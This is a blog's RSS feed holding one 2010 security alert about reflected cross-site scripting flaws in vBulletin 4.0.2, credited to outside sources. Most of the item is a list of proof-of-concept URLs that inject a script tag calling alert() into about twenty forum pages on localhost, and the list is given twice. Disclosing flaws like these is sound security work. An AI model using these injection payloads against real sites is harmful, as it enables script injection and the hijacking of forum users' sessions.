<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>vBTruth &#187; xss</title>
	<atom:link href="http://vbtruth.com/tag/xss/feed/" rel="self" type="application/rss+xml" />
	<link>http://vbtruth.com</link>
	<description>Shining Light on Internet Brand&#039;s Disaster</description>
	<lastBuildDate>Tue, 10 Aug 2010 16:41:12 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=abc</generator>
		<item>
		<title>Security Alert: Multiple XSS Vulnerabilities in Internet Brands&#8217;s vBulletin 4 Forum and vBulletin 4 Suite</title>
		<link>http://vbtruth.com/security-alert-multiple-xss-vulnerabilities-in-internet-brandss-vbulletin-4-forum-and-vbulletin-4-suite/190/</link>
		<comments>http://vbtruth.com/security-alert-multiple-xss-vulnerabilities-in-internet-brandss-vbulletin-4-forum-and-vbulletin-4-suite/190/#comments</comments>
		<pubDate>Mon, 22 Feb 2010 18:20:05 +0000</pubDate>
		<dc:creator>Veritas</dc:creator>
				<category><![CDATA[Internet Brands]]></category>
		<category><![CDATA[vBulletin]]></category>
		<category><![CDATA[security flaw]]></category>
		<category><![CDATA[xss]]></category>

		<guid isPermaLink="false">http://vbtruth.com/?p=190</guid>
		<description><![CDATA[Vendor: Internet Brands (NASDAQ: INET) Product: vBulletin 4 Forum, vBulletin 4 Suite Version: 4.0.2 Vector of Attack: Cross Site Scripting Source: Inje3ct0r, vBulletin.com Details: # Exploit  : http://127.0.0.1/upload/calendar.php?acuparam=&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/faq.php?acuparam=&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/forum.php?acuparam=&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/usercp.php/&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/subscription.php? acuparam=&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/showthread.php?acuparam=&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/showgroups.php/&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/sendmessage.php/&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/search.php/&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/register.php?acuparam=&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/profile.php?acuparam=&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/private.php?acuparam=&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/online.php/&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/newthread.php?acuparam=&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/misc.php/&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/memberlist.php?=&#62;&#8221;&#8216;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/member.php/&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/inlinemod.php?acuparam=&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/index.php/&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/forumdisplay.php?acuparam=&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; Additional vulnerabilities found by vBulletin Forum Members http://127.0.0.1/upload/content.php/&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62; http://127.0.0.1/upload/blog.php/&#62;&#8221;&#62;&#60;ScRiPt&#62;alert(213771818860)&#60;/ScRiPt&#62;]]></description>
			<content:encoded><![CDATA[<p><span style="font-family: 'Times New Roman'; line-height: normal; font-size: small;"> </span></p>
<div style="background-image: initial; background-attachment: initial; background-origin: initial; background-clip: initial; background-color: #ffffff; font: normal normal normal 13px/19px Georgia, 'Times New Roman', 'Bitstream Charter', Times, serif; background-position: initial initial; background-repeat: initial initial; padding: 0.6em; margin: 0px;">
<p>Vendor: Internet Brands (NASDAQ: INET)<br />
Product: vBulletin 4 Forum, vBulletin 4 Suite<br />
Version: 4.0.2<br />
Vector of Attack: Cross Site Scripting<br />
Source: <a href="http://inj3ct0r.net/exploits/11001">Inje3ct0r</a>, <a href="http://www.vbulletin.com/forum/showthread.php?342835-xss-exploit-for-vbulletin-4.0.1-and-4.0.2">vBulletin.com</a></p>
<p>Details:</p>
<div id="_mcePaste"># Exploit  :</div>
<div id="_mcePaste">http://127.0.0.1/upload/calendar.php?acuparam=&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div id="_mcePaste">http://127.0.0.1/upload/faq.php?acuparam=&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div id="_mcePaste">http://127.0.0.1/upload/forum.php?acuparam=&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div id="_mcePaste">http://127.0.0.1/upload/usercp.php/&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div id="_mcePaste">http://127.0.0.1/upload/subscription.php?</div>
<div>acuparam=&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/showthread.php?acuparam=&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/showgroups.php/&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/sendmessage.php/&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/search.php/&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/register.php?acuparam=&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/profile.php?acuparam=&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/private.php?acuparam=&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/online.php/&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/newthread.php?acuparam=&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/misc.php/&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/memberlist.php?=&gt;&#8221;&#8216;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/member.php/&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/inlinemod.php?acuparam=&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/index.php/&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/forumdisplay.php?acuparam=&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>Additional vulnerabilities found by vBulletin Forum Members</div>
<div id="_mcePaste">http://127.0.0.1/upload/content.php/&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
<div>http://127.0.0.1/upload/blog.php/&gt;&#8221;&gt;&lt;ScRiPt&gt;alert(213771818860)&lt;/ScRiPt&gt;</div>
</div>
]]></content:encoded>
			<wfw:commentRss>http://vbtruth.com/security-alert-multiple-xss-vulnerabilities-in-internet-brandss-vbulletin-4-forum-and-vbulletin-4-suite/190/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
